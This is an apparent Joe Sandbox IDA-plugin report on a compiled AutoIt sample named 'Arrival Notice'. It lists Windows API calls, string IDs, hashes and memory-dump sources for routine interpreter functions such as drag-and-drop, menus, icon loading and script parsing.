                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: 32737b73eb9979a5e4b95c8c86bdd316f2109fd0d84481693cbcd4ba2fdbdc44
                                              • Instruction ID: 54688f0d99a070ae1c5ccd2383360d3198596cd46d1264d92cc09ea6979d50ca
                                              • Opcode Fuzzy Hash: 32737b73eb9979a5e4b95c8c86bdd316f2109fd0d84481693cbcd4ba2fdbdc44
                                              • Instruction Fuzzy Hash: 7D71E174154309AFD720CF29DC59F6A7BEAFB88315F08062DF985872A0D770E90ADB16
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • DragQueryPoint.SHELL32(?,?), ref: 0095C917
                                                • Part of subcall function 0095ADF1: ClientToScreen.USER32(?,?), ref: 0095AE1A
                                                • Part of subcall function 0095ADF1: GetWindowRect.USER32(?,?), ref: 0095AE90
                                                • Part of subcall function 0095ADF1: PtInRect.USER32(?,?,0095C304), ref: 0095AEA0
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0095C980
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0095C98B
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0095C9AE
                                              • _wcscat.LIBCMT ref: 0095C9DE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0095C9F5
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0095CA0E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0095CA25
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0095CA47
                                              • DragFinish.SHELL32(?), ref: 0095CA4E
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0095CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                              • API String ID: 169749273-3440237614
                                              • Opcode ID: 6fabbcd98335636c3065b8dd408aa876545cc7835ef76a646b57a00e4041376c
                                              • Instruction ID: 4d44e8b9006a5d0432929c6b91610abe3b6ac66d9d717741e203a97ea7499a99
                                              • Opcode Fuzzy Hash: 6fabbcd98335636c3065b8dd408aa876545cc7835ef76a646b57a00e4041376c
                                              • Instruction Fuzzy Hash: 05615771108311AFC711EF69CC95E9BBBE8FF88754F000A2EF591922A1DB709A49CB52
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 009546AB
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009546F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: c156ed47fd213c5e877e95b28dc426e936df36252ea4dec2c90b9d3baad23047
                                              • Instruction ID: ff3b456205c0c297b7281687a8767c847984ff7c6d4df57b9e82d5ee678e7efa
                                              • Opcode Fuzzy Hash: c156ed47fd213c5e877e95b28dc426e936df36252ea4dec2c90b9d3baad23047
                                              • Instruction Fuzzy Hash: 63917B342043159FCB14EF25C461A6ABBA5FF85318F04495DFC969B3A2CB34ED4ACB82
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0095BB6E
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00959431), ref: 0095BBCA
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095BC03
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0095BC46
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095BC7D
                                              • FreeLibrary.KERNEL32(?), ref: 0095BC89
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095BC99
                                              • DestroyIcon.USER32(?,?,?,?,?,00959431), ref: 0095BCA8
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0095BCC5
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0095BCD1
                                                • Part of subcall function 008F313D: __wcsicmp_l.LIBCMT ref: 008F31C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 1212759294-1154884017
                                              • Opcode ID: 661a2f5ffcb670b7cf6b81b280283f1ed001c1ff28388c8ca989d2eb1571e435
                                              • Instruction ID: a507c30a6f9bb4845098f6d3f3003213af750afcf94bb108adc12b2463bcb9ff
                                              • Opcode Fuzzy Hash: 661a2f5ffcb670b7cf6b81b280283f1ed001c1ff28388c8ca989d2eb1571e435
                                              • Instruction Fuzzy Hash: B5610271500219BAEB14DF69CC45FBE7BACFB08722F104219FD15D61C0DB74AA94DBA0
                                              APIs
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • CharLowerBuffW.USER32(?,?), ref: 0093A636
                                              • GetDriveTypeW.KERNEL32 ref: 0093A683
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A6CB
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A702
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A730
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: dd87298ae46ffadb29722aaf742680165dd3d98c4078863349e66c4a33881c7c
                                              • Instruction ID: 366db89d8c7abf375c1cb473daf004bad58ada480267cb97eea26f188035c1f0
                                              • Opcode Fuzzy Hash: dd87298ae46ffadb29722aaf742680165dd3d98c4078863349e66c4a33881c7c
                                              • Instruction Fuzzy Hash: B35138711043059FD710EF24C89196AB7E8FF94718F044A6EF89697361EB35AE0ACB52
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0093A47A
                                              • __swprintf.LIBCMT ref: 0093A49C
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0093A4D9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0093A4FE
                                              • _memset.LIBCMT ref: 0093A51D
                                              • _wcsncpy.LIBCMT ref: 0093A559
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0093A58E
                                              • CloseHandle.KERNEL32(00000000), ref: 0093A599
                                              • RemoveDirectoryW.KERNEL32(?), ref: 0093A5A2
                                              • CloseHandle.KERNEL32(00000000), ref: 0093A5AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: 240514883a5a7f324089f8313e17712dc55e9bdb7cc81c5fec673563daf55dd3
                                              • Instruction ID: 1501c0cda75ec97e8c5aa93bfd7981035b8d68018589f85215a56aad4fe07468
                                              • Opcode Fuzzy Hash: 240514883a5a7f324089f8313e17712dc55e9bdb7cc81c5fec673563daf55dd3
                                              • Instruction Fuzzy Hash: 5531BEB2604209ABDB219FA1DC48FEF33BCEF88751F1040B6FA08D6160EB7096448B25
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00959476,?,?), ref: 0095BD10
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD27
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD32
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD3F
                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD48
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD57
                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD60
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD67
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00959476,?,?,00000000,?), ref: 0095BD78
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00962CAC,?), ref: 0095BD91
                                              • GlobalFree.KERNEL32(00000000), ref: 0095BDA1
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0095BDC5
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0095BDF0
                                              • DeleteObject.GDI32(00000000), ref: 0095BE18
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0095BE2E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: 86af560ed69f0526232596a247cfb66234c723b07a0ec73c2a3da32ef6dedad7
                                              • Instruction ID: 69a90e73100fa2a8f85c26ebe7c58e3ab3e3f053e6e95d8fdd89638b9d766e0f
                                              • Opcode Fuzzy Hash: 86af560ed69f0526232596a247cfb66234c723b07a0ec73c2a3da32ef6dedad7
                                              • Instruction Fuzzy Hash: E6412775604208AFDB11DF66DC58EABBBB8EB89722F104068F905D72A0D7309905DB60
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 0093DC7B
                                              • _wcscat.LIBCMT ref: 0093DC93
                                              • _wcscat.LIBCMT ref: 0093DCA5
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0093DCBA
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0093DCCE
                                              • GetFileAttributesW.KERNEL32(?), ref: 0093DCE6
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0093DD00
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0093DD12
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: 96a79ffec15e94ac1875da63fd8e4bedad1ab088aef873a9bbc545b345cae3f9
                                              • Instruction ID: 90fdfcf1e6c905882c69ae68d4623716c7aa375a13199dbd8d48b5d3350ad353
                                              • Opcode Fuzzy Hash: 96a79ffec15e94ac1875da63fd8e4bedad1ab088aef873a9bbc545b345cae3f9
                                              • Instruction Fuzzy Hash: 6E8180725153459FCB24EF28D8659AAB7E8FB88310F198C2EF899C7250EB34D944CF52
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0095C4EC
                                              • GetFocus.USER32 ref: 0095C4FC
                                              • GetDlgCtrlID.USER32(00000000), ref: 0095C507
                                              • _memset.LIBCMT ref: 0095C632
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0095C65D
                                              • GetMenuItemCount.USER32(?), ref: 0095C67D
                                              • GetMenuItemID.USER32(?,00000000), ref: 0095C690
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0095C6C4
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0095C70C
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0095C744
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0095C779
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: 9690cde8921c2e16c7f869c8b38e705ba233b8c82fa47c4bb7b94379cdcc5af2
                                              • Instruction ID: 282981d862cc4af99946fa62313c0657b09769c95aa36d55d9b2271b878aa6b5
                                              • Opcode Fuzzy Hash: 9690cde8921c2e16c7f869c8b38e705ba233b8c82fa47c4bb7b94379cdcc5af2
                                              • Instruction Fuzzy Hash: D68180B0209305AFD710CF26C984A6BBBE8FB88355F10492EFD9597291D770E909DF92
                                              APIs
                                                • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
                                                • Part of subcall function 0092874A: GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
                                                • Part of subcall function 0092874A: GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
                                                • Part of subcall function 0092874A: HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
                                                • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D
                                                • Part of subcall function 009287E7: GetProcessHeap.KERNEL32(00000008,00928240,00000000,00000000,?,00928240,?), ref: 009287F3
                                                • Part of subcall function 009287E7: HeapAlloc.KERNEL32(00000000,?,00928240,?), ref: 009287FA
                                                • Part of subcall function 009287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00928240,?), ref: 0092880B
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00928458
                                              • _memset.LIBCMT ref: 0092846D
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092848C
                                              • GetLengthSid.ADVAPI32(?), ref: 0092849D
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 009284DA
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009284F6
                                              • GetLengthSid.ADVAPI32(?), ref: 00928513
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00928522
                                              • HeapAlloc.KERNEL32(00000000), ref: 00928529
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092854A
                                              • CopySid.ADVAPI32(00000000), ref: 00928551
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00928582
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009285A8
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009285BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 105e21f915047bbdb8fde2080944b25dbc5723d388e9484179e48170056ba817
                                              • Instruction ID: 4c84bc515e20d784d7f46d56f5c7cb7dbbad14c0439c397a7963fac88e5400e9
                                              • Opcode Fuzzy Hash: 105e21f915047bbdb8fde2080944b25dbc5723d388e9484179e48170056ba817
                                              • Instruction Fuzzy Hash: 0E61597190121AABDF00DFA5EC48EAEBBB9FF04311F088169F815A7291DB349A04DF60
                                              APIs
                                              • GetDC.USER32(00000000), ref: 009476A2
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009476AE
                                              • CreateCompatibleDC.GDI32(?), ref: 009476BA
                                              • SelectObject.GDI32(00000000,?), ref: 009476C7
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0094771B
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00947757
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0094777B
                                              • SelectObject.GDI32(00000006,?), ref: 00947783
                                              • DeleteObject.GDI32(?), ref: 0094778C
                                              • DeleteDC.GDI32(00000006), ref: 00947793
                                              • ReleaseDC.USER32(00000000,?), ref: 0094779E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 5e3194bf0a6b55a18e9d2bfc55f39f993cb899636c23f3f73c5097b58468653e
                                              • Instruction ID: 98c0d330b6954667366003622b029db2a99b686f78f5cdbd09539a8bd1abbcb9
                                              • Opcode Fuzzy Hash: 5e3194bf0a6b55a18e9d2bfc55f39f993cb899636c23f3f73c5097b58468653e
                                              • Instruction Fuzzy Hash: 86513875908309EFCB15CFA9CC85EAEBBB9EF48710F14852DF94AA7250D731A940CB60
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,0095FB78), ref: 0093A0FC
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0093A11E
                                              • __swprintf.LIBCMT ref: 0093A177
                                              • __swprintf.LIBCMT ref: 0093A190
                                              • _wprintf.LIBCMT ref: 0093A246
                                              • _wprintf.LIBCMT ref: 0093A264
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-2391861430
                                              • Opcode ID: eb5eb1eed25adf99cd34a109c5e0b1951bd72f068c2364f4ffe84b42fb7ab84f
                                              • Instruction ID: 1bed7ac30e7368332a35a8a5f77a3daed82b37a5a8c364dba0f3f0169289e060
                                              • Opcode Fuzzy Hash: eb5eb1eed25adf99cd34a109c5e0b1951bd72f068c2364f4ffe84b42fb7ab84f
                                              • Instruction Fuzzy Hash: 99518E31904219AACF15EBE4CD86EEEB779FF04300F100266F515B22A1EB356F48DB52
                                              APIs
                                                • Part of subcall function 008F0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008D6C6C,?,00008000), ref: 008F0BB7
                                                • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008D6D0D
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008D6E5A
                                                • Part of subcall function 008D59CD: _wcscpy.LIBCMT ref: 008D5A05
                                                • Part of subcall function 008F387D: _iswctype.LIBCMT ref: 008F3885
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-1018226102
                                              • Opcode ID: 48e519085459b35d7f45786fbf7e3f36f57b85194464837b72756317532b3815
                                              • Instruction ID: a58f73cf7a9e53af7b390a34907c0f4d4aeaec2c76a1d7b2d05812229d7ed005
                                              • Opcode Fuzzy Hash: 48e519085459b35d7f45786fbf7e3f36f57b85194464837b72756317532b3815
                                              • Instruction Fuzzy Hash: F90258711083459FC724EF28C891AAEBBE5FF99314F144A1EF496972A1EB30D949CB43
                                              APIs
                                              • _memset.LIBCMT ref: 008D45F9
                                              • GetMenuItemCount.USER32(00996890), ref: 0090D7CD
                                              • GetMenuItemCount.USER32(00996890), ref: 0090D87D
                                              • GetCursorPos.USER32(?), ref: 0090D8C1
                                              • SetForegroundWindow.USER32(00000000), ref: 0090D8CA
                                              • TrackPopupMenuEx.USER32(00996890,00000000,?,00000000,00000000,00000000), ref: 0090D8DD
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0090D8E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
